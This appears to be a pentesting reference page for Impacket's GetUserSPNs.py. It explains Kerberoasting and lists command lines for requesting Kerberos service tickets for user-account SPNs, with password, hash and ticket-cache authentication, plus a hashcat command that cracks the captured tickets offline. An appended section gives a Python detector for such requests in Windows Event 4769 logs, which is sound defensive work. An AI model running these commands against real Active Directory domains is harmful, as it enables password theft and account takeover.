GetUserSPNs

Description

This module tries to find Service Principal Names (SPNs) that are associated with normal user accounts. Because a normal user account's password tends to be shorter than a machine account's, and because a TGS request returns a ticket encrypted with the key of the account the SPN runs under, valid TGS tickets gathered for those SPNs can be used for offline brute-forcing of the service account's NTLM hash.

Usage

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password
GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password -request
GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.10.10.10 qu35t.pw/

Authentication

GetUserSPNs.py -hashes LMHASH:NTHASH -dc-ip 10.10.10.10 qu35t.pw/svc_user
GetUserSPNs.py -dc-ip 10.10.10.10 -no-pass qu35t.pw/svc_user
export KRB5CCNAME=svc_user.ccache
GetUserSPNs.py -k -no-pass -dc-host dc1.qu35t.pw qu35t.pw/svc_user

Hashcat Cracking

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
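A defensive counterpart to the workflow above, added here as an example and not part of the original page: a small Python detector over Windows Security Event ID 4769 (Kerberos service ticket requested) records that flags successful RC4-HMAC (etype 0x17) service-ticket requests for user-account SPNs, the ticket type hashcat mode 13100 cracks, when one requester collects several of them in a short window. The 4769 field names are the real event schema; the sample events, the 5-minute window and the threshold of three services are constructed assumptions.

```python
"""Flag likely Kerberoasting in Windows Security Event 4769 (service ticket requested).
Requests for RC4-HMAC (etype 0x17) tickets to user-account SPNs, the format hashcat
mode 13100 cracks, stand out when one requester pulls many of them in a short burst."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

def ev(time, user, service, etype, ip, status="0x0"):
    """Build a 4769-shaped record; field names follow the real event schema."""
    return {"time": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}

# Constructed sample events, not real log data.
SAMPLE_EVENTS = [
    ev("2024-05-01T10:00:01", "svc_user@QU35T.PW", "krbtgt", "0x12", "10.10.10.50"),
    ev("2024-05-01T10:00:02", "svc_user@QU35T.PW", "WS01$", "0x12", "10.10.10.50"),
    ev("2024-05-01T10:00:03", "svc_user@QU35T.PW", "svc_sql", "0x17", "10.10.10.50"),
    ev("2024-05-01T10:00:03", "svc_user@QU35T.PW", "svc_http", "0x17", "10.10.10.50"),
    ev("2024-05-01T10:00:04", "svc_user@QU35T.PW", "svc_backup", "0x17", "10.10.10.50"),
    ev("2024-05-01T11:30:00", "alice@QU35T.PW", "svc_sql", "0x17", "10.10.10.77"),
]

def is_roastable_request(event):
    """Successful RC4 service ticket for a non-machine, non-krbtgt SPN."""
    svc = event["ServiceName"]
    return (event["Status"] == "0x0"
            and event["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")          # machine accounts have long random keys
            and svc.lower() != "krbtgt")       # TGT requests are not the pattern here

def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Flag each (requester, source IP) that obtained RC4 tickets for at least
    `min_services` distinct user-account SPNs inside a sliding `window`."""
    by_requester = defaultdict(list)
    for event in events:
        if is_roastable_request(event):
            key = (event["TargetUserName"], event["IpAddress"])
            by_requester[key].append((datetime.fromisoformat(event["time"]), event["ServiceName"]))
    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts.append({"requester": user, "source": ip, "services": sorted(services)})
                break
    return alerts
```

On a real estate the events would come from the DC's Security log (Event ID 4769 with TicketEncryptionType 0x17); lowering `min_services` to 1 turns the burst detector into a plain inventory of every RC4 service ticket issued for a user account, which is also the list of accounts to move to AES-only keys.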